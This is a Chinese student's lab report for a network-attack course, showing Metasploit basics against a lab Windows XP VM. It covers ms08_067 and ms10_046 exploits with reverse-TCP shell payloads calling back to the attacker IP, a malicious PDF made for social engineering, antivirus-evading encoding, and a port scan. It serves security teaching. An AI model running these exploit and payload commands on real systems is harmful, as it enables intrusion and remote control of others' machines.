• 2019-2020-2 20175316 盛茂淞 《网络对抗技术》 Exp6 MSF基础应用


    2019-2020-2 20175316 盛茂淞 《网络对抗技术》 Exp6 MSF基础应用

    一.实践原理与说明

    实践原理

    1、 MSF主要模块:指Metasploit框架中所使用的一段软件代码组件

    • 查看六种模块源码目录/usr/share/metasploit-framework/modules
    • 渗透攻击模块(Exploit Modules)
      • 攻击漏洞,把shellcode"背"过去
      • 针对每一个漏洞,写一段攻击代码
    • 辅助模块(Auxiliary Modules)
      • 在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
    • 攻击载荷(Payload Modules)
      • 载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
    • 空字段模块(Payload Modules)
    • 编码模块(Payload Modules)
    • 后渗透攻击模块(Payload Modules)

    2、 MSF常用漏洞指令

    • search name:用指定关键字搜索可以利用的漏洞模块
    • use exploit name:使用漏洞
    • show options:显示配置选项
    • set option name option:设置选项
    • show payloads:回链攻击载荷
    • show targets: 显示目标(os版本)
    • set TARGET target number:设置目标版本
    • exploit:开始漏洞攻击
    • sessions -l:列出会话
    • sessions -i id:选择会话
    • sessions -k id:结束会话
    • Ctrl+z:把会话放到后台
    • Ctrl+c:结束会话
    • show auxiliary:显示辅助模块
    • use auxiliary name:使用辅助模块
    • set option name option:设置选项
    • exploit:运行模块

    基础问题回答

    • Q:用自己的话解释什么是exploit,payload,encode.
      exploit:就是利用漏洞,通过后门程序或者恶意代码来攻击漏洞
      payload:有效载荷,payload和load的区别就是,load是载荷,也就是一个恶意程序,可能表面上伪装成有什么正常的功能;而payload是有效载荷,也就是载荷中有效的那部分,最关键的部分,可以说是恶意程序中起决定性作用的那段代码,比如之前的shellcode
      encode:编码或者说是加密,其实加密的本质就是对信息进行编码,主要为了免杀,通过对恶意代码进行编码,使杀软无法利用特征码检测出来

    二.实践目标

    • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
      • 1.1一个主动攻击实践,如ms08_067; (1分)
      • 1.2 一个针对浏览器的攻击,如ms11_050;(1分)
      • 1.3 一个针对客户端的攻击,如Adobe;(1分)
      • 1.4 成功应用任何一个辅助模块。(0.5分)
    • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分

    三.实践内容与步骤

    任务一:主动攻击实践,ms08-067(成功)

    • 漏洞描述:ms08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码,可用于进行蠕虫攻击。受影响的系统有 Microsoft Windows 2000、Windows XP 和 Windows Server 2003
    • 主机:kali
    • IP:192.168.136.128
    • 靶机:Windows XP English
    • IP:192.168.136.142

    首先确保两台机器之间能ping通:

    攻击者试探靶机是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.136.142

    进入msf,使用search ms08-067查看漏洞位置

    使用use exploit/windows/smb/ms08_067_netapi选择该漏洞
    set payload generic/shell_reverse_tcp设置攻击的载荷
    使用show payloads查看可用载荷
    set RHOSTS 192.168.136.142设置靶机IP
    set LHOSTS 192.168.136.128设置攻击机IP

    exploit进行攻击

    第一次攻击失败,换个端口继续攻击

    攻击成功,可用ipconfig/all命令验证连接结果

    任务二:一个针对浏览器的攻击

    • 实现:ms13-90(失败)

    • 攻击机:kali 192.168.136.128

    • 靶机:Windows xp sp3 192.168.136.142

    • 进入msf,使用search ms13_90查看漏洞位置

    • 使用use exploit/windows/browser/cardspacesigninhelper选择该漏洞

    • 输入show options看一下需要设置哪些

    • 提示需要设置

    • 使用set SRVHOST 192.168.136.128设置监听者地址

    • 使用set SRVPORT 8080设置监听者端口

    • exploit开始攻击

    • 在xp访问该网站,但是msf显示ie不支持,攻击失败

    换另一个攻击试试:ms10_46(成功且唯一)

    • 使用: use windows/browser/ms10_046_shortcut_icon_dllloader
    • 查看一下这个漏洞的作用:info
    • 此模块利用处理Windows快捷方式文件(.LNK)时的漏洞,其中包含指向恶意DLL。此模块创建可以使用的WebDAV服务,当以UNC路径访问时,可以运行任意负载。
    show payloads      //显示可用攻击载荷
    set payload windows/meterpreter/reverse_tcp   //选择攻击载荷
    set LHOST 192.168.136.128     //设置监听地址
    exploit     //进行攻击
    
    • 在靶机用浏览器打开生成的链接:

    • 查看会话: sessions

    • 选取会话: session -i 1

    • 攻击成功,但出现一些乱码,不知道怎么回事

    任务三:一个针对客户端的攻击(adobe_pdf_embedded_exe)

    • 实现:adobe_pdf_embedded_exe

    • 攻击机:kali 192.168.136.128

    • 靶机:Windows xp sp3 192.168.136.142

    • 使用:search adobe查找并选择漏洞

    • 漏洞描述:This module embeds a Metasploit payload into an existing PDF file.
      The resulting PDF can be sent to a target as part of a social
      engineering attack.

    • 使用:use windows/fileformat/adobe_pdf_embedded_exe使用漏洞

    • payload:windows/meterpreter/reverse_tcp

    • 设置攻击者地址 set LHOST 192.168.136.128

    • 设置生成pdf文件 set FILENAME 20175316.pdf

    • 攻击 exploit

    • 将生成的文件复制之后导入靶机中:cp /root/.msf4/local/20175316.pdf 20175316.pdf

    • 在靶机中使用双击打开20175316,没反应,攻击失败

    任务四:成功应用任何一个辅助模块(scanner/portscan/tcp成功)

    • 实现:scanner/portscan/tcp

    • 攻击机:kali 192.168.136.128

    • 靶机:Windows xp sp3 192.168.136.142

    • 使用:search auxiliary查找并选择漏洞

    • 输入info来查看这个模块的信息

    • 模块描述: Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.通过在每个端口上执行完整的TCP连接来枚举打开的TCP服务。这不需要目标计算机上的管理权限。也就是说可以扫描开放的TCP端口

    • 设置目标主机的IP set LHOST 192.168.136.142

    • 设线程数为10 set threads 10

    • exploit

    • 成功

    四.遇到的问题及解决方法

    • 问题一:一开始用了win7环境,有漏洞但是主动攻击(ms08_067)无法实现,应该是漏洞被修复了

    五.总结心得

    • 刘老师为我们讲解了几种不同方式的攻击,还对我们提出了严格的要求。不知道是不是我的电脑原因,能用的模块都是一个一个试出来的,不仅试模块还试虚拟机试软件版本,直到最后成功做了出来,期间电脑还被弄崩了一次,心力交瘁,但是收获很多
  • 相关阅读:
    C函数
    iOS开发- 蓝牙后台接收数据(BLE4.0)
    相册权限 第一次安装、用户是否授权
    使用免费的产品搭建直播系统
    搭建HTTP Live Streaming直播系统
    HTTP Live Streaming直播(iOS直播)技术分析与实现
    个人工作总结03
    个人工作总结02
    个人工作总结01
    第七周学习进度
  • 原文地址:https://www.cnblogs.com/sms369/p/12820551.html
Copyright © 2020-2023  润新知